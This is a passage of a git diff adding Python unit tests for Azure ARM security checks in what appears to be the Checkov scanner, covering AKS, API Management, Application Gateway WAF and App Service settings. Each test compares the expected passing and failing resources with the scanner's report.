+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AKSEncryptionAtHostEnabled.py b/tests/arm/checks/resource/test_AKSEncryptionAtHostEnabled.py
new file mode 100644
index 00000000000..f4bcd7bbc60
--- /dev/null
+++ b/tests/arm/checks/resource/test_AKSEncryptionAtHostEnabled.py
@@ -0,0 +1,44 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AKSEncryptionAtHostEnabled import check
+
+
+class TestAKSEncryptionAtHostEnabled(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AKSEncryptionAtHostEnabled")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ContainerService/managedClusters.pass',
+            'Microsoft.ContainerService/managedClusters/agentPools.passA'
+        }
+        failing_resources = {
+            'Microsoft.ContainerService/managedClusters.fail1',
+            'Microsoft.ContainerService/managedClusters.fail2',
+            'Microsoft.ContainerService/managedClusters/agentPools.failA1',
+            'Microsoft.ContainerService/managedClusters/agentPools.failA2',
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_AKSEphemeralOSDisks.py b/tests/arm/checks/resource/test_AKSEphemeralOSDisks.py
new file mode 100644
index 00000000000..a5b5925f336
--- /dev/null
+++ b/tests/arm/checks/resource/test_AKSEphemeralOSDisks.py
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AKSEphemeralOSDisks import check
+
+
+class TestAKSEphemeralOSDisks(unittest.TestCase):
+
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_AKSEphemeralOSDisks"
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ContainerService/managedClusters.pass',
+        }
+        failing_resources = {
+            'Microsoft.ContainerService/managedClusters.fail',
+            'Microsoft.ContainerService/managedClusters.fail2',
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_AKSLocalAdminDisabled.py b/tests/arm/checks/resource/test_AKSLocalAdminDisabled.py
new file mode 100644
index 00000000000..1ddf5e66cbd
--- /dev/null
+++ b/tests/arm/checks/resource/test_AKSLocalAdminDisabled.py
@@ -0,0 +1,34 @@
+import unittest
+from checkov.arm.checks.resource.AKSLocalAdminDisabled import check
+from pathlib import Path
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAKSLocalAdminDisabled(unittest.TestCase):
+    def test_summary(self):
+        test_files_dir = Path(__file__).parent / "example_AKSLocalAdminDisabled"
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.ContainerService/managedClusters.pass",
+        }
+        failing_resources = {
+            "Microsoft.ContainerService/managedClusters.fail",
+            "Microsoft.ContainerService/managedClusters.fail2"
+        }
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertSetEqual(passing_resources, passed_check_resources)
+        self.assertSetEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AKSMaxPodsMinimum.py b/tests/arm/checks/resource/test_AKSMaxPodsMinimum.py
new file mode 100644
index 00000000000..8e08f442264
--- /dev/null
+++ b/tests/arm/checks/resource/test_AKSMaxPodsMinimum.py
@@ -0,0 +1,43 @@
+import os
+import unittest
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AKSMaxPodsMinimum import check
+
+
+class TestAKSMaxPodsMinimum(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_AKSMaxPodsMinimum"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.ContainerService/managedClusters.agentPoolProfiles_with_maxPods_pass",
+            "Microsoft.ContainerService/managedClusters/agentPools.properties_with_maxPods_pass1"
+        }
+        failing_resources = {
+            "Microsoft.ContainerService/managedClusters.agentPoolProfiles_with_maxPods_fail4",
+            "Microsoft.ContainerService/managedClusters.agentPoolProfiles_without_maxPods_fail3",
+            "Microsoft.ContainerService/managedClusters/agentPools.properties_with_maxPods_fail2",
+            "Microsoft.ContainerService/managedClusters/agentPools.properties_without_maxPods_fail",
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AKSPoolTypeIsScaleSet.py b/tests/arm/checks/resource/test_AKSPoolTypeIsScaleSet.py
new file mode 100644
index 00000000000..c5664c810bc
--- /dev/null
+++ b/tests/arm/checks/resource/test_AKSPoolTypeIsScaleSet.py
@@ -0,0 +1,42 @@
+
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AKSPoolTypeIsScaleSet import check
+
+
+class TestAKSPoolTypeIsScaleSet(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AKSPoolTypeIsScaleSet")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ContainerService/managedClusters.pass',
+            'Microsoft.ContainerService/managedClusters.pass1',
+        }
+        failing_resources = {
+            'Microsoft.ContainerService/managedClusters.fail',
+        }
+        skipped_resources = {}
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AKSUpgradeChannel.py b/tests/arm/checks/resource/test_AKSUpgradeChannel.py
new file mode 100644
index 00000000000..1fd9863c73f
--- /dev/null
+++ b/tests/arm/checks/resource/test_AKSUpgradeChannel.py
@@ -0,0 +1,42 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AKSUpgradeChannel import check
+
+
+class TestAKSUpgradeChannel(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AKSUpgradeChannel")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ContainerService/managedClusters.pass',
+        }
+        failing_resources = {
+            'Microsoft.ContainerService/managedClusters.fail',
+            'Microsoft.ContainerService/managedClusters.fail1',
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_APIManagementMinTLS12.py b/tests/arm/checks/resource/test_APIManagementMinTLS12.py
new file mode 100644
index 00000000000..6d42fc2c7a7
--- /dev/null
+++ b/tests/arm/checks/resource/test_APIManagementMinTLS12.py
@@ -0,0 +1,45 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.APIManagementMinTLS12 import check
+from checkov.arm.runner import Runner
+
+
+class TestAPIManagementMinTLS12(unittest.TestCase):
+    def test(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_APIManagementMinTLS12"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.ApiManagement/service.pass",
+        }
+
+        failing_resources = {
+            "Microsoft.ApiManagement/service.fail",
+            "Microsoft.ApiManagement/service.fail2",
+            "Microsoft.ApiManagement/service.fail3",
+            "Microsoft.ApiManagement/service.fail4",
+            "Microsoft.ApiManagement/service.fail5",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passed_check_resources))
+        self.assertEqual(summary["failed"], len(failed_check_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_APIManagementPublicAccess.py b/tests/arm/checks/resource/test_APIManagementPublicAccess.py
new file mode 100644
index 00000000000..f68537b54c5
--- /dev/null
+++ b/tests/arm/checks/resource/test_APIManagementPublicAccess.py
@@ -0,0 +1,42 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.APIManagementPublicAccess import check
+from checkov.arm.runner import Runner
+
+
+class TestAPIManagementPublicAccess(unittest.TestCase):
+    def test(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_APIManagementPublicAccess"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.ApiManagement/service.pass",
+        }
+
+        failing_resources = {
+            "Microsoft.ApiManagement/service.fail",
+            "Microsoft.ApiManagement/service.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AkSSecretStoreRotation.py b/tests/arm/checks/resource/test_AkSSecretStoreRotation.py
new file mode 100644
index 00000000000..7ead5385404
--- /dev/null
+++ b/tests/arm/checks/resource/test_AkSSecretStoreRotation.py
@@ -0,0 +1,40 @@
+from checkov.arm.checks.resource.AkSSecretStoreRotation import check
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+
+
+class TestAKSSecretStoreRotation(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AkSSecretStoreRotation")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ContainerService/managedClusters.pass',
+        }
+        failing_resources = {
+            'Microsoft.ContainerService/managedClusters.fail',
+            'Microsoft.ContainerService/managedClusters.fail1',
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AppGWDefinesSecureProtocols.py b/tests/arm/checks/resource/test_AppGWDefinesSecureProtocols.py
new file mode 100644
index 00000000000..13edb50bf9d
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppGWDefinesSecureProtocols.py
@@ -0,0 +1,43 @@
+import os
+import unittest
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AppGWDefinesSecureProtocols import check
+
+
+class TestAppGWDefinesSecureProtocols(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+        test_files_dir = os.path.join(current_dir, "example_AppGWDefinesSecureProtocols")
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.Network/applicationGateways.with_protocolversion_and_cipher_pass',
+            'Microsoft.Network/applicationGateways.with_policyName_pass1'
+        }
+        failing_resources = {
+            'Microsoft.Network/applicationGateways.without_sslPolicy_fail',
+            'Microsoft.Network/applicationGateways.empty_sslPolicy_fail1',
+            'Microsoft.Network/applicationGateways.with_protocolversion_and_cipher_fail2',
+            'Microsoft.Network/applicationGateways.with_policyName_fail3',
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AppGatewayWAFACLCVE202144228.py b/tests/arm/checks/resource/test_AppGatewayWAFACLCVE202144228.py
new file mode 100644
index 00000000000..d42ea1004e6
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppGatewayWAFACLCVE202144228.py
@@ -0,0 +1,44 @@
+import unittest
+from pathlib import Path
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.AppGatewayWAFACLCVE202144228 import check
+from checkov.arm.runner import Runner
+
+
+class TestAppGatewayWAFACLCVE202144228(unittest.TestCase):
+    def test(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AppGatewayWAFACLCVE202144228"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies.owasp_3_1_default_pass",
+            "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies.owasp_3_2_default_pass",
+            "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies.version_3_1_default_pass",
+            "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies.owasp_3_1_disabled_different_pass",
+            "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies.empty_disabled_rules_pass",
+        }
+        failing_resources = {
+            "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies.owasp_3_0_fail",
+            "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies.owasp_3_1_disabled_fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AppServiceDisallowCORS.py b/tests/arm/checks/resource/test_AppServiceDisallowCORS.py
new file mode 100644
index 00000000000..6de73058d88
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceDisallowCORS.py
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.AppServiceDisallowCORS import check
+
+
+class TestAPPServiceDisallowCORS(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AppServiceDisallowCORS"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.pass",
+
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AppServiceFTPSState.py b/tests/arm/checks/resource/test_AppServiceFTPSState.py
new file mode 100644
index 00000000000..acade3a9a2e
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceFTPSState.py
@@ -0,0 +1,45 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AppServiceFTPSState import check
+
+
+class TestAppServiceFTPSState(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AppServiceFTPSState")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.Web/sites.pass',
+            'Microsoft.Web/sites.pass2',
+            'Microsoft.Web/sites.pass3'
+        }
+        failing_resources = {
+            'Microsoft.Web/sites.fail',
+            'Microsoft.Web/sites.fail2',
+            'Microsoft.Web/sites.fail3'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AppServiceIdentityProviderEnabled.py b/tests/arm/checks/resource/test_AppServiceIdentityProviderEnabled.py
new file mode 100644
index 00000000000..050e63e593d
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceIdentityProviderEnabled.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AppServiceIdentityProviderEnabled import check
+
+
+class TestAppServiceIdentityProviderEnabled(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AppServiceIdentityProviderEnabled")
+        report = runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+         "Microsoft.Web/sites.pass",
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+        }
+
+
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
diff --git a/tests/arm/checks/resource/test_AppServiceInstanceMinimum.py b/tests/arm/checks/resource/test_AppServiceInstanceMinimum.py
new file mode 100644
index 00000000000..34af68e5801
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceInstanceMinimum.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.AppServiceInstanceMinimum import check
+
+
+class TestAppServiceInstanceMinimum(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AppServiceInstanceMinimum"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.pass",
+            "Microsoft.Web/sites/slots.pass2",
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+            "Microsoft.Web/sites.unknown",
+            "Microsoft.Web/sites/slots.fail2",
+            "Microsoft.Web/sites/slots.unknown2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AppServiceJavaVersion.py b/tests/arm/checks/resource/test_AppServiceJavaVersion.py
new file mode 100644
index 00000000000..a554d699363
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceJavaVersion.py
@@ -0,0 +1,41 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AppServiceJavaVersion import check
+
+
+class TestAppServiceJavaVersion(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AppServiceJavaVersion")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.Web/sites.pass',
+        }
+        failing_resources = {
+            'Microsoft.Web/sites.fail',
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AppServicePHPVersion.py b/tests/arm/checks/resource/test_AppServicePHPVersion.py
new file mode 100644
index 00000000000..23892df321e
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServicePHPVersion.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.AppServicePHPVersion import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAppServicePHPVersion(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AppServicePHPVersion"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.pass",
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AppServicePlanZoneRedundant.py b/tests/arm/checks/resource/test_AppServicePlanZoneRedundant.py
new file mode 100644
index 00000000000..589649c9345
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServicePlanZoneRedundant.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.AppServicePlanZoneRedundant import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAppServicePlanZoneRedundant(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AppServicePlanZoneRedundant"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/serverfarms.pass",
+        }
+        failing_resources = {
+            "Microsoft.Web/serverfarms.fail",
+            "Microsoft.Web/serverfarms.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AppServicePublicAccessDisabled.py b/tests/arm/checks/resource/test_AppServicePublicAccessDisabled.py
new file mode 100644
index 00000000000..7f4194e2f65
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServicePublicAccessDisabled.py
@@ -0,0 +1,48 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.AppServicePublicAccessDisabled import check
+
+
+class TestAppServicePublicAccessDisabled(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AppServicePublicAccessDisabled"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.linuxPass",
+            "Microsoft.Web/sites.windowsPass",
+            "Microsoft.Web/sites/slots.slotPass",
+            "Microsoft.Web/sites/config.configPass",
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.linuxDefault",
+            "Microsoft.Web/sites.windowsDefault",
+            "Microsoft.Web/sites.linuxFail",
+            "Microsoft.Web/sites.windowsFail",
+            "Microsoft.Web/sites/slots.slotFail",
+            "Microsoft.Web/sites/config.configFail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
